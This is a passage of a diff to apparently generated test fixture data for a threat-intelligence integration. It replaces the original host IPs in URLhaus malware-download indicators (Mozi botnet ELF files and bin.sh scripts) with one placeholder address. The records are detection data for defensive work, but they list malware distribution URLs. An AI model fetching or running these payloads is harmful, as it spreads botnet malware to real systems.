- "ip": "36.224.231.40"
+ "ip": "89.160.20.156"
  }
  },
  "event": {
- "ingested": "2021-12-13T06:08:08.694114802Z",
- "original": "{\"id\":\"961120\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961120/\",\"url\":\"http://36.224.231.40:44124/Mozi.a\",\"url_status\":\"online\",\"host\":\"36.224.231.40\",\"date_added\":\"2021-01-14 17:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027646100Z",
+ "original": "{\"id\":\"961120\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961120/\",\"url\":\"http://89.160.20.156:44124/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
  "category": "threat",
  "type": "indicator",
  "kind": "enrichment"
@@ -20854,18 +20854,18 @@
  "url": {
  "path": "/Mozi.m",
  "extension": "m",
- "original": "http://223.212.211.103:33802/Mozi.m",
+ "original": "http://89.160.20.156:33802/Mozi.m",
  "scheme": "http",
  "port": 33802,
- "domain": "223.212.211.103",
- "full": "http://223.212.211.103:33802/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:33802/Mozi.m"
  },
- "ip": "223.212.211.103"
+ "ip": "89.160.20.156"
  }
  },
  "event": {
- "ingested": "2021-12-13T06:08:08.694119530Z",
- "original": "{\"id\":\"961115\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961115/\",\"url\":\"http://223.212.211.103:33802/Mozi.m\",\"url_status\":\"online\",\"host\":\"223.212.211.103\",\"date_added\":\"2021-01-14 17:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027653Z",
+ "original": "{\"id\":\"961115\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961115/\",\"url\":\"http://89.160.20.156:33802/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
  "category": "threat",
  "type": "indicator",
  "kind": "enrichment"
@@ -20903,18 +20903,18 @@
  "url": {
  "path": "/Mozi.m",
  "extension": "m",
- "original": "http://59.99.95.124:43806/Mozi.m",
+ "original": "http://89.160.20.156:43806/Mozi.m",
  "scheme": "http",
  "port": 43806,
- "domain": "59.99.95.124",
- "full": "http://59.99.95.124:43806/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:43806/Mozi.m"
  },
- "ip": "59.99.95.124"
+ "ip": "89.160.20.156"
  }
  },
  "event": {
- "ingested": "2021-12-13T06:08:08.694123187Z",
- "original": "{\"id\":\"961116\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961116/\",\"url\":\"http://59.99.95.124:43806/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.95.124\",\"date_added\":\"2021-01-14 17:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027659900Z",
+ "original": "{\"id\":\"961116\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961116/\",\"url\":\"http://89.160.20.156:43806/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
  "category": "threat",
  "type": "indicator",
  "kind": "enrichment"
@@ -20952,18 +20952,18 @@
  "url": {
  "path": "/Mozi.m",
  "extension": "m",
- "original": "http://59.97.169.13:52278/Mozi.m",
+ "original": "http://89.160.20.156:52278/Mozi.m",
  "scheme": "http",
  "port": 52278,
- "domain": "59.97.169.13",
- "full": "http://59.97.169.13:52278/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:52278/Mozi.m"
  },
- "ip": "59.97.169.13"
+ "ip": "89.160.20.156"
  }
  },
  "event": {
- "ingested": "2021-12-13T06:08:08.694126483Z",
- "original": "{\"id\":\"961117\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961117/\",\"url\":\"http://59.97.169.13:52278/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.97.169.13\",\"date_added\":\"2021-01-14 17:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027666800Z",
+ "original": "{\"id\":\"961117\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961117/\",\"url\":\"http://89.160.20.156:52278/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
  "category": "threat",
  "type": "indicator",
  "kind": "enrichment"
@@ -21001,18 +21001,18 @@
  "url": {
  "path": "/Mozi.m",
  "extension": "m",
- "original": "http://39.64.134.162:41202/Mozi.m",
+ "original": "http://89.160.20.156:41202/Mozi.m",
  "scheme": "http",
  "port": 41202,
- "domain": "39.64.134.162",
- "full": "http://39.64.134.162:41202/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:41202/Mozi.m"
  },
- "ip": "39.64.134.162"
+ "ip": "89.160.20.156"
  }
  },
  "event": {
- "ingested": "2021-12-13T06:08:08.694129990Z",
- "original": "{\"id\":\"961114\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961114/\",\"url\":\"http://39.64.134.162:41202/Mozi.m\",\"url_status\":\"online\",\"host\":\"39.64.134.162\",\"date_added\":\"2021-01-14 17:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027673700Z",
+ "original": "{\"id\":\"961114\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961114/\",\"url\":\"http://89.160.20.156:41202/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
  "category": "threat",
  "type": "indicator",
  "kind": "enrichment"
@@ -21050,18 +21050,18 @@
  "url": {
  "path": "/Mozi.m",
  "extension": "m",
- "original": "http://182.117.84.206:35756/Mozi.m",
+ "original": "http://89.160.20.156:35756/Mozi.m",
  "scheme": "http",
  "port": 35756,
- "domain": "182.117.84.206",
- "full": "http://182.117.84.206:35756/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:35756/Mozi.m"
  },
- "ip": "182.117.84.206"
+ "ip": "89.160.20.156"
  }
  },
  "event": {
- "ingested": "2021-12-13T06:08:08.694133547Z",
- "original": "{\"id\":\"961113\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961113/\",\"url\":\"http://182.117.84.206:35756/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.117.84.206\",\"date_added\":\"2021-01-14 17:36:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027680600Z",
+ "original": "{\"id\":\"961113\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961113/\",\"url\":\"http://89.160.20.156:35756/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:36:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
  "category": "threat",
  "type": "indicator",
  "kind": "enrichment"
@@ -21099,18 +21099,18 @@
  "url": {
  "path": "/Mozi.m",
  "extension": "m",
- "original": "http://186.33.123.61:40569/Mozi.m",
+ "original": "http://89.160.20.156:40569/Mozi.m",
  "scheme": "http",
  "port": 40569,
- "domain": "186.33.123.61",
- "full": "http://186.33.123.61:40569/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:40569/Mozi.m"
  },
- "ip": "186.33.123.61"
+ "ip": "89.160.20.156"
  }
  },
  "event": {
- "ingested": "2021-12-13T06:08:08.694136863Z",
- "original": "{\"id\":\"961112\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961112/\",\"url\":\"http://186.33.123.61:40569/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.123.61\",\"date_added\":\"2021-01-14 17:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027687600Z",
+ "original": "{\"id\":\"961112\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961112/\",\"url\":\"http://89.160.20.156:40569/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
  "category": "threat",
  "type": "indicator",
  "kind": "enrichment"
@@ -21148,18 +21148,18 @@
  "url": {
  "path": "/Mozi.m",
  "extension": "m",
- "original": "http://182.112.20.174:47645/Mozi.m",
+ "original": "http://89.160.20.156:47645/Mozi.m",
  "scheme": "http",
  "port": 47645,
- "domain": "182.112.20.174",
- "full": "http://182.112.20.174:47645/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:47645/Mozi.m"
  },
- "ip": "182.112.20.174"
+ "ip": "89.160.20.156"
  }
  },
  "event": {
- "ingested": "2021-12-13T06:08:08.694140420Z",
- "original": "{\"id\":\"961111\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961111/\",\"url\":\"http://182.112.20.174:47645/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.112.20.174\",\"date_added\":\"2021-01-14 17:36:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027694600Z",
+ "original": "{\"id\":\"961111\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961111/\",\"url\":\"http://89.160.20.156:47645/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:36:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
  "category": "threat",
  "type": "indicator",
  "kind": "enrichment"
@@ -21197,18 +21197,18 @@
  "url": {
  "path": "/Mozi.m",
  "extension": "m",
- "original": "http://123.13.77.167:40023/Mozi.m",
+ "original": "http://89.160.20.156:40023/Mozi.m",
  "scheme": "http",
  "port": 40023,
- "domain": "123.13.77.167",
- "full": "http://123.13.77.167:40023/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:40023/Mozi.m"
  },
- "ip": "123.13.77.167"
+ "ip": "89.160.20.156"
  }
  },
  "event": {
- "ingested": "2021-12-13T06:08:08.694143696Z",
- "original": "{\"id\":\"961110\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961110/\",\"url\":\"http://123.13.77.167:40023/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.13.77.167\",\"date_added\":\"2021-01-14 17:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027701700Z",
+ "original": "{\"id\":\"961110\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961110/\",\"url\":\"http://89.160.20.156:40023/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
  "category": "threat",
  "type": "indicator",
  "kind": "enrichment"
@@ -21246,18 +21246,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://115.48.204.10:53402/Mozi.m",
+ "original": "http://89.160.20.156:53402/Mozi.m",
 "scheme": "http",
 "port": 53402,
- "domain": "115.48.204.10",
- "full": "http://115.48.204.10:53402/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:53402/Mozi.m"
 },
- "ip": "115.48.204.10"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694147012Z",
- "original": "{\"id\":\"961109\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961109/\",\"url\":\"http://115.48.204.10:53402/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.48.204.10\",\"date_added\":\"2021-01-14 17:34:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027708700Z",
+ "original": "{\"id\":\"961109\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961109/\",\"url\":\"http://89.160.20.156:53402/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:34:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -21296,18 +21296,18 @@
 "url": {
 "path": "/bin.sh",
 "extension": "sh",
- "original": "http://175.214.73.205:36316/bin.sh",
+ "original": "http://89.160.20.156:36316/bin.sh",
 "scheme": "http",
 "port": 36316,
- "domain": "175.214.73.205",
- "full": "http://175.214.73.205:36316/bin.sh"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:36316/bin.sh"
 },
- "ip": "175.214.73.205"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694150408Z",
- "original": "{\"id\":\"961108\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961108/\",\"url\":\"http://175.214.73.205:36316/bin.sh\",\"url_status\":\"offline\",\"host\":\"175.214.73.205\",\"date_added\":\"2021-01-14 17:29:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}",
+ "ingested": "2021-12-13T08:40:08.027715600Z",
+ "original": "{\"id\":\"961108\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961108/\",\"url\":\"http://89.160.20.156:36316/bin.sh\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:29:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -21346,18 +21346,18 @@
 "url": {
 "path": "/bin.sh",
 "extension": "sh",
- "original": "http://117.248.61.75:48105/bin.sh",
+ "original": "http://89.160.20.156:48105/bin.sh",
 "scheme": "http",
 "port": 48105,
- "domain": "117.248.61.75",
- "full": "http://117.248.61.75:48105/bin.sh"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:48105/bin.sh"
 },
- "ip": "117.248.61.75"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694160317Z",
- "original": "{\"id\":\"961107\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961107/\",\"url\":\"http://117.248.61.75:48105/bin.sh\",\"url_status\":\"offline\",\"host\":\"117.248.61.75\",\"date_added\":\"2021-01-14 17:28:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}",
+ "ingested": "2021-12-13T08:40:08.027722500Z",
+ "original": "{\"id\":\"961107\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961107/\",\"url\":\"http://89.160.20.156:48105/bin.sh\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:28:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -21395,18 +21395,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://42.231.245.237:40017/Mozi.m",
+ "original": "http://89.160.20.156:40017/Mozi.m",
 "scheme": "http",
 "port": 40017,
- "domain": "42.231.245.237",
- "full": "http://42.231.245.237:40017/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:40017/Mozi.m"
 },
- "ip": "42.231.245.237"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694166569Z",
- "original": "{\"id\":\"961103\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961103/\",\"url\":\"http://42.231.245.237:40017/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.231.245.237\",\"date_added\":\"2021-01-14 17:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027729400Z",
+ "original": "{\"id\":\"961103\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961103/\",\"url\":\"http://89.160.20.156:40017/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -21444,18 +21444,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://59.99.45.199:41906/Mozi.m",
+ "original": "http://89.160.20.156:41906/Mozi.m",
 "scheme": "http",
 "port": 41906,
- "domain": "59.99.45.199",
- "full": "http://59.99.45.199:41906/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:41906/Mozi.m"
 },
- "ip": "59.99.45.199"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694171047Z",
- "original": "{\"id\":\"961104\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961104/\",\"url\":\"http://59.99.45.199:41906/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.45.199\",\"date_added\":\"2021-01-14 17:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027736300Z",
+ "original": "{\"id\":\"961104\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961104/\",\"url\":\"http://89.160.20.156:41906/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -21493,18 +21493,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://42.237.48.61:38607/Mozi.m",
+ "original": "http://89.160.20.156:38607/Mozi.m",
 "scheme": "http",
 "port": 38607,
- "domain": "42.237.48.61",
- "full": "http://42.237.48.61:38607/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:38607/Mozi.m"
 },
- "ip": "42.237.48.61"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694174854Z",
- "original": "{\"id\":\"961105\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961105/\",\"url\":\"http://42.237.48.61:38607/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.237.48.61\",\"date_added\":\"2021-01-14 17:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027743200Z",
+ "original": "{\"id\":\"961105\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961105/\",\"url\":\"http://89.160.20.156:38607/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -21542,18 +21542,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://59.93.23.63:59331/Mozi.m",
+ "original": "http://89.160.20.156:59331/Mozi.m",
 "scheme": "http",
 "port": 59331,
- "domain": "59.93.23.63",
- "full": "http://59.93.23.63:59331/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:59331/Mozi.m"
 },
- "ip": "59.93.23.63"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694178491Z",
- "original": "{\"id\":\"961106\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961106/\",\"url\":\"http://59.93.23.63:59331/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.93.23.63\",\"date_added\":\"2021-01-14 17:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027750100Z",
+ "original": "{\"id\":\"961106\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961106/\",\"url\":\"http://89.160.20.156:59331/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -21591,18 +21591,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://182.126.118.45:53932/Mozi.m",
+ "original": "http://89.160.20.156:53932/Mozi.m",
 "scheme": "http",
 "port": 53932,
- "domain": "182.126.118.45",
- "full": "http://182.126.118.45:53932/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:53932/Mozi.m"
 },
- "ip": "182.126.118.45"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694181948Z",
- "original": "{\"id\":\"961102\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961102/\",\"url\":\"http://182.126.118.45:53932/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.126.118.45\",\"date_added\":\"2021-01-14 17:20:24 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027756900Z",
+ "original": "{\"id\":\"961102\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961102/\",\"url\":\"http://89.160.20.156:53932/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:24 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -21640,18 +21640,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://42.230.152.22:58385/Mozi.m",
+ "original": "http://89.160.20.156:58385/Mozi.m",
 "scheme": "http",
 "port": 58385,
- "domain": "42.230.152.22",
- "full": "http://42.230.152.22:58385/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:58385/Mozi.m"
 },
- "ip": "42.230.152.22"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694185434Z",
- "original": "{\"id\":\"961101\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961101/\",\"url\":\"http://42.230.152.22:58385/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.230.152.22\",\"date_added\":\"2021-01-14 17:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027765100Z",
+ "original": "{\"id\":\"961101\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961101/\",\"url\":\"http://89.160.20.156:58385/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -21689,18 +21689,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://186.33.105.12:57010/Mozi.m",
+ "original": "http://89.160.20.156:57010/Mozi.m",
 "scheme": "http",
 "port": 57010,
- "domain": "186.33.105.12",
